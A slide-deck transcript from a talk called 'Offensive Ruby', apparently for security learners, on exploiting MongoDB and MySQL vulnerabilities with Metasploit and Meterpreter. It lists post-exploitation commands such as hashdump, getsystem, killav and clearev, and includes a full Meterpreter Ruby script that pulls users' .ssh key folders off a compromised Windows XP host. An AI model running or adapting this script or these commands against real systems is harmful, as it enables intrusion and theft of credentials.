Offensive Ruby

Offensive Ruby Ausmarton Zarino Fernandes Developer/Consultant @ausmarton

Vulnerability (CVE-2013-1892): Specially crafted calls to the nativeHelper function in
SpiderMonkey in MongoDB, could be used to exploit. Affects: • MongoDB < 2.0.9 and 2.2.x < 2.2.4 • x86 Linux Exploit Ref: www.exploit-db.com/exploits/24935/ Offensive Ruby: Exploiting MongoDB/Ubuntu

• Payload (not an exploit) • In-memory DLL injection •
Dynamically extensible • Client supports many languages Offensive Ruby: Meterpreter

Offensive Ruby: Meterpreter Victim Metasploit Framework Exploit + Payload (Stage
1) Target Process Remote code execution Connect back to MSF DLL Injection Payload (Stage 2) Meterpreter Server DLL Meterpreter Server Meterpreter Client TLS/1.0 with TLV Encrypted communication between Meterpreter Client and Server IRB Shell PHP Shell

• Core irb, migrate, sessions, background • Stdapi mkdir, ifconfig,
route, shell, clearev, screenshot • Priv getsystem, hashdump Offensive Ruby: Meterpreter Commands

Scripts provide more features and can be used with “run”
• checkvm • killav • hostedit • winenum Offensive Ruby: Bundled Scripts

Vulnerability (CVE-2012-5613): FILE privilege misconfiguration in MySQL can be exploited
on Windows with the use of an MOF file Affects(Tested on): • MySQL 5.0.45 • Windows XP SP3 Exploit Ref: www.exploit-db.com/exploits/23179/ Offensive Ruby: Exploiting MySQL/Windows

• client client.sys.config client.sys.process client.net.config • Create your <script>.rb in
/usr/share/metasploit-framework/scripts/meterpreter • “run <script>” from meterpreter Offensive Ruby: Custom Scripts

def profile_path(profiles_reg_key, sid) sys_drive_var = "%SystemDrive%" system_drive = client.fs.file.expand_path(sys_drive_var).to_s registry_getvaldata(profiles_reg_key
+ "\\" + sid,"ProfileImagePath") .gsub!(/\0/,'').sub(sys_drive_var, system_drive) end if client.sys.config.sysinfo['OS'].include? "Windows XP" then print_status "Windows XP found, trying to get user list" profiles_reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" registry_enumkeys(profiles_reg_key).flatten.each do |sid| path = profile_path(profiles_reg_key, sid) unless path.include? "systemprofile" ssh_keys_dir = path + "\\.ssh" if client.fs.file.exists? ssh_keys_dir print_status "Downloading ssh keys from #{ssh_keys_dir}" client.fs.dir.download("/tmp/", "#{ssh_keys_dir}") end end end else print_error "Victim is not running Windows XP, giving up!" end Offensive Ruby: Fetching contents of .ssh

• www.offensive-security.com/metasploit-unleashed • www.github.com/rapid7/meterpreter • www.exploit-db.com • Harmony Security's paper
on Reflective DLL Injection Offensive Ruby: References

Offensive Ruby

Offensive Ruby

Ausmarton Zarino Fernandes

More Decks by Ausmarton Zarino Fernandes

Other Decks in Technology

Featured

Transcript

Offensive Ruby Ausmarton Zarino Fernandes Developer/Consultant @ausmarton

Vulnerability (CVE-2013-1892): Specially crafted calls to the nativeHelper function in

• Payload (not an exploit) • In-memory DLL injection •

Offensive Ruby: Meterpreter Victim Metasploit Framework Exploit + Payload (Stage

• Core irb, migrate, sessions, background • Stdapi mkdir, ifconfig,

Scripts provide more features and can be used with “run”

Vulnerability (CVE-2012-5613): FILE privilege misconfiguration in MySQL can be exploited

• client client.sys.config client.sys.process client.net.config • Create your <script>.rb in

def profile_path(profiles_reg_key, sid) sys_drive_var = "%SystemDrive%" system_drive = client.fs.file.expand_path(sys_drive_var).to_s registry_getvaldata(profiles_reg_key

• www.offensive-security.com/metasploit-unleashed • www.github.com/rapid7/meterpreter • www.exploit-db.com • Harmony Security's paper